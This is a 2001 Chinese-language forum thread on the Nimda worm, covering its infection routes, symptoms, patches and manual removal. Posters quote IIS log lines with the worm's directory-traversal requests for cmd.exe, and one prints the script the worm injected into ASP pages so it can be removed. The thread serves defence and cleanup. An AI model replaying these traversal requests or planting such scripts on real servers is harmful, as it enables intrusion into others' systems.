最近似乎又有類似red code的新病毒囉
是透過IIS的CGi漏洞感染的...
如果主機中了毒
還會繼續對別人做攻擊
並且會發現c:\裡面多了Admin.dll和readme.eml
readme.eml用到了outlook express錯誤的mime-type的漏洞
導致一開啟那個信件便會自動執行裡面那個有著網頁圖示的readme.exe
然後你的電腦便會變得很慢很慢，mmc也都不能用了......#%(&^%#

有開80 port的人可以看看你的log檔
也許就會發現多了一堆

211.74.192.112 - - [19/Sep/2001:02:11:11 +0800] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 403 -
2f../winnt/system32/cmd.exe HTTP/1.0" 403 -
211.228.165.37 - - [19/Sep/2001:02:20:14 +0800] "GET /scripts/root.exe

之類的東西.............:confused:

沒錯!另一種正在蔓延,要小心!(開防火牆)

寶寶已經中獎了~~正要貼而己說~~


正在檢查中~~~


http://www.cert.org.tw/cindex.htm
可能一觸即發的另一波新的 IIS 風暴

很多電腦都中了.....
我公司也中,大小客戶也一堆有疑似中毒症狀.
一定又是一波大流行~~~~~~~~~~~~~
真是雪上加霜 -__-"

是Nimda的電腦病毒??今早有看到報導，大家得多留心點


根據了解，Nimda是藉由散發中毒的電子郵件，或者透過中毒的電腦網站到處流傳，電子郵件特徵是，沒有標題，而且附加了一個名叫read me的檔案。

symantec對此病毒的說法與解法
http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

粉難處理,
可以看看IIS的Log file,去查對方的IIS居然也都中了,不下百個ㄟ,
大家再瀏覽網站可得小心點~最好更新一下最新的病毒碼,
不然怎死的都不知道

我電腦裡面也有到找一個叫Admin.dll的檔案是不是也中毒了丫???
請告訴我嗎???thx~~~~~~~~~

[引言]http://www.microsoft.com/taiwan/support/content/6496.htm


３．安裝完上述修正程式後，請將電腦重新開機等待10分鐘後，
依照下列方法，來判斷您是否已將Code Red病毒完全移除。
1). 請檢查您C：磁碟機以及D：磁碟機的根目錄下是否有Explorer.exe，
如果有的話，代表您的系統中依然有Code Red的病毒，請手動刪除這兩個檔案，
並重新執行移除Code Red病毒的步驟。


-----------------------------------------------------------------------------
搜尋偶電腦中，發現了三個Explorer.exe，砍了兩個..還有一支在下圖的位置
砍不掉會出現正在使用...
偶想先請問一下..這個位置的這個檔可以砍嗎??


http://topia.yam.com/home/soccer2001/pages/image/sos02.jpg

上面的那個檔好像不能砍的..><...


----------------------------------


現在偶還有一個小小的問題..(偶的修補程都安裝好了..)
因為該病毒感染後會尋找並修改htm, .html 及.asp等檔案修改為病毒格式檔案


現在只要開偶主機上有.asp的網頁
只有按一下連結唷..會開啟兩個網頁...


原本未安裝修正程式的時候會開啟一個下載的畫面(如下)，要偶下載軟体，
但現在變成一個 " 找不到網頁 "的網頁，這個要怎麼改掉它阿????
http://topia.yam.com/home/soccer2001/pages/image/sos.jpg

找到了..


在被感染的asp程式中找關鍵字 "readme "就可以看到一排字串


"<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>"


將此字串刪除就不會再出現一個" 找不到網頁 "的視窗了~~~蠻累人的..@@
因為要是有一個站台都是用asp寫的(如snitz)那不就....


不知道有沒有快一點的方法內..~

目前所知的方法是,先下載IE的修補檔,有IIS的也先下載修補檔,再灌防毒軟體(趨勢,賽門鐵克)liveupdate,拔掉網路線,掃毒,再修補之前的檔.

Hmm... 我碰到的大概是已經變種過的, 跟前面所說的症狀不太一樣

[發病前]
已由 Trend ScanMail for Exchange (趨勢電子郵件防毒軟體) 發現並刪除其附件 NINJING.BAT,
信件本文為我公司某客戶發給我的信函, 內容正常為一般商業書信往來,
但是也因為如此失去戒心, 將其開啟後便感染病毒

[症狀]
病毒掃描 outlook 寄件備份匣, 將裡面的信件轉存為 eml 格式的檔案, 並儲存在你電腦
中所有有開資源分享的目錄裡, 目錄裡同時可以發現一個名為 riched20.dll 的檔案

*** 我想這就是這隻病毒最大的特點, 它等於沒有固定的本文格式, 而是將你的寄件夾帶
病毒之後發送出去, 因此當你朋友收到之後會認為是一般正常的信件, 而開啟導致中毒 ***

傳播途徑除透過 e-mail 之外, 區域網路(資源共享), iis 服務 皆可傳播病毒

此外在宿主的電腦 Windows\system 裡可以發現 Load.exe 這個檔案 以及 Windows\temp
裡會有數個 xxxxxxx.tmp.exe 檔案

[手動移除]

1. 拔掉網路線, 尤其是同一區網內的電腦都中毒的話, 不拔掉會互相感染, 殺不勝殺
2. 開啟 system.ini, 找到 shell=explorer.exe 這個字串, 正常情況之下, explorer.exe
之後應該沒有任何的字串, 若有的話, 將之全部刪掉, 然後存檔重新開機
3. 開機之後將先前所提的 load.exe / xxxxxxxx.tmp.exe / *.eml 所有檔案 /
riched20.dll 刪除(這個病毒檔應該只有 40 幾K, 而且只存在於你有開分享的目錄中)

Nimda的電腦病毒這個蠕蟲(Worm)會以三種不同的方式散播，包括：
利用電子郵件e-mail、資源分享及透過IIS 並且啟動"IIS Web Directory Traversal exploit"服務的主機，當蠕蟲(Worm)利用e-mail散播時，信件會夾帶readme.exe或 readme.wav 或 readme.com等檔案,執行檔案時.會在C:\Windows\Temp內建立meXXXXX.tmp.exe暫存檔檔案，這個檔案是e-mail格式，並且包含蠕蟲(Worm)所夾帶的病毒檔案


微軟修補檔下載:
IE 5.x 的使用者：修復 IE 5.x 的網址(MS01-020)
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp


IIS 的使用者：
修復 IIS 的網址(MS01-044)
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp


修復 IIS 的網址(MS00-078)
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp


詳情可參考以下網站說明及介紹
台灣網路危機處理中心
http://www.cert.org.tw/news/25.htm


Symantec較詳細的移除說明
http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html


PC-cillin（趨勢科技）提供的移除說明
http://www.trend.com.tw/EncyclopediaV2/vinfo/virusencyclo/blacklist.htm

不知道是否有人注意到將Nimda反過來唸剛好是Admin,這是WINDOWS作業系統的主要控制者.
而且攻擊對象好像都是Microsoft作業系統.

Nimda直接唸是不是很像〝你媽的〞

我的机器已经中了毒。
而且硬盘整个数据已经丢失了。

請教一下我的IE版本是5.01
為何要執行IE修正檔時
卻出現"此系統不需要安裝這更新組件"
這個訊息?,謝謝

是呀！
我們公司是區域網路！
病毒一直層出不窮！
真的感覺好無力喔！
:mad:

最初由 kc029894
請教一下我的IE版本是5.01
為何要執行IE修正檔時
卻出現"此系統不需要安裝這更新組件"
這個訊息?,謝謝

http://www.microsoft.com/taiwan/support/content/nimda.htm
有提到:

IE 5.01 -> IE 5.00.2919
IE 5.01 SP1 -> IE 5.00.31xx
IE 5.01 SP2 -> IE 5.00.33xx
IE 5.5 -> IE 5.50.4131
IE 5.5 SP1 -> IE 5.50.4522
IE 5.5 SP2 -> IE 5.50.4807

如果您的 IE 是 SP2 版, 則不需要更新.:rolleyes:

最初由 ellery


http://www.microsoft.com/taiwan/support/content/nimda.htm
有提到:

IE 5.01 -> IE 5.00.2919
IE 5.01 SP1 -> IE 5.00.31xx
IE 5.01 SP2 -> IE 5.00.33xx
IE 5.5 -> IE 5.50.4131
IE 5.5 SP1 -> IE 5.50.4522
IE 5.5 SP2 -> IE 5.50.4807

如果您的 IE 是 SP2 版, 則不需要更新.:rolleyes: 我的是IE 5.01 -> IE 5.00.2919
而更新的元件 是在下面的網址所下載的
http://www.microsoft.com/windows/ie/downloads/critical/q290108/download.asp

是不是我要從IE 5.01升級成IE 5.01 SP1 才能用更新元件
或者直接升級為IE 5.01 SP2或IE 5.5 SP2
還有IE 5.01 SP2 及 IE 5.5 SP2 要去哪裡抓
謝謝！

我們公司內部也是網路流竄病毒
我已經修復了2台啦

不知電腦病毒的戰爭何時才能結束
啊
無語問蒼天啦

嗯......不知道該病毒會不會嚴重影響網路連線品質?

病毒已經蔓延好幾天了, 小弟來補充一點症狀

娜妲病毒 (NIMDA) 刷新病毒感染模式, 除了透過 Email 感染之外, 電腦族只要連上中毒網站, 就可能遭病毒感染, 中毒者將會每隔10 天, 將病毒傳給通訊錄中的聯絡人, 並允許駭客存取你電腦中的檔案

中了娜妲病毒可能症狀
1. Office2000 不能存檔, 也不能重新安裝 (Riched20.dll 中毒)
2. Internet Explorer 不能升級, 也不能重新安裝

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
下載解毒程式(趨勢科技)
http://www.trend.com.tw/System/DownloadDirect.asp?Url=/pub/download/CleanTools/FIX_NIMDA1.22.EXE (台灣)

詳細說明
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_NIMDA.A

WinME 使用者請看 "Additional Clean Instructions On Windows ME"
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_NIMDA.A (英文)
留意 C:\_Restore 檔案匣內容是否清除

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
如何修復 Office2000
OFF: Setup Error 2889 Caused by Nimda Virus Infection
http://support.microsoft.com/support/kb/articles/Q308/3/57.ASP

OFF2000: Internal Error 2894 During Office Installation
http://support.microsoft.com/support/kb/articles/Q236/0/53.ASP

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
如何恢復 Riched20.dll
Win98 使用者執行 "SFC.EXE" 抽出一個檔案 "Riched20.dll"

Restore the RICHED20.DLL file by performing any of the following:
Note:Change the <%drive%> entry with the drive letter of your CD-ROM drive.

Using Windows 98 SE installation CD, click Start>Run. On the window that pops out, type:
extract /a <%drive%>:\win98\setup\win98_37.cab riched20.dll /L c:\windows\system

Using Windows ME installation CD, click Start>Run. On the window that pops out, type:
extract /a :\win9x\win_14.cab riched20.dll /L c:\windows\system

Using Office 2000 Premium Edition, click Start>Run. On the window that pops out, type:
extract /a <%drive%>:\office1.cab riched20.dll /L c:\windows\system

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
立刻安裝 IE 系統安全修正程式或升級到 IE5.5 SP2 or IE5.01 SP2

詳情請看
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/topics/Nimda.asp

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
IE 系統安全修正程式(請跳過 MS01-020, 直接看 MS01-027)
Microsoft Security Bulletin MS01-027
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-027.asp

如果您使用微軟IE 瀏覽器,請連接下列微軟公司網站更新 IE 的修正程式
Internet Explorer 5.01
http://www.microsoft.com/windows/ie/download/critical/q295106/default.asp
Internet Explorer 5.5
http://www.microsoft.com/windows/ie/downloads/critical/q299618/default.asp

請選擇適當的版本(English or Chinese Traditional)
q295106.exe for IE5.01, 檔案大小: 352 KB, 3 min @ 28.8 kbps
q299618.exe for IE5.5, 檔案大小: 2.08 MB, 17 min @ 28.8 kbps

嗯...我的電腦並沒有中,不過同一區網中的人有中,
症狀是Norton忽然跳出來說"Desktop.eml在Upload資料夾中..."
我都是砍掉啦,直到寫文章之前才知道是很厲害的病毒
現在把所有有分享的,通通關了.
奇怪的是,有時是Desktop.eml,有時是AlXXX(忘了).eml,有一次
OutlookExpress自己還跳出來,說因為無聯絡人故無法XXX(忘了)

還好我都用別的軟體收信,每次看到有人因為用Outlookexpress中毒,
都很想叫她換一個軟體,唉...回應永遠只有一個樣:"不習慣,這個不會用啦,換回來"

預防勝於治療
小心防範
自求多福

我也中獎了 , 但它不限於 *.eml 的型式 , 我是用最笨的方法找的 , 用記事本打開 readme.eml , copy 了一段 "X-MSMail-Priority" 的文字出來 , 把它貼在尋找檔案或資料的項目中 , 我就發現 5xxx 個檔案 , 其中也有歌名的 *.eml , 另外有執行過的壓縮檔 *.exe 也會中毒 , 沒執行的就不會了 .....供大家參考 !!

防毒軟體有檔下來，這樣算不算中獎呀！

我架的Linux主機~~每天起碼都被4.5台中毒的電腦掃~~奇怪的是ip幾乎都203開頭~~都是Giga個人架站又不懂維修網頁??很想通知它們~~想想.....算了~~不關我的事

最初由 dominic 發表
我架的Linux主機~~每天起碼都被4.5台中毒的電腦掃~~奇怪的是ip幾乎都203開頭~~都是Giga個人架站又不懂維修網頁??很想通知它們~~想想.....算了~~不關我的事

個人網頁的空間也會招受病毒的感染呀，我以為只有公司行的比較容易受感染。

我們公司也是很慘哦~~~~~~ > <....

最初由 dominic 發表
都是Giga個人架站又不懂維修網頁??很想通知它們~~想想.....算了~~不關我的事
建議您不要太好心，上次我就是這麼好心，結果對方以為我寄病毒給他，他就回信問候我媽，叫我不要亂寄病毒
他也幫幫忙沒有純文字的EMail也能讓他中毒喔，所以我就問候他全家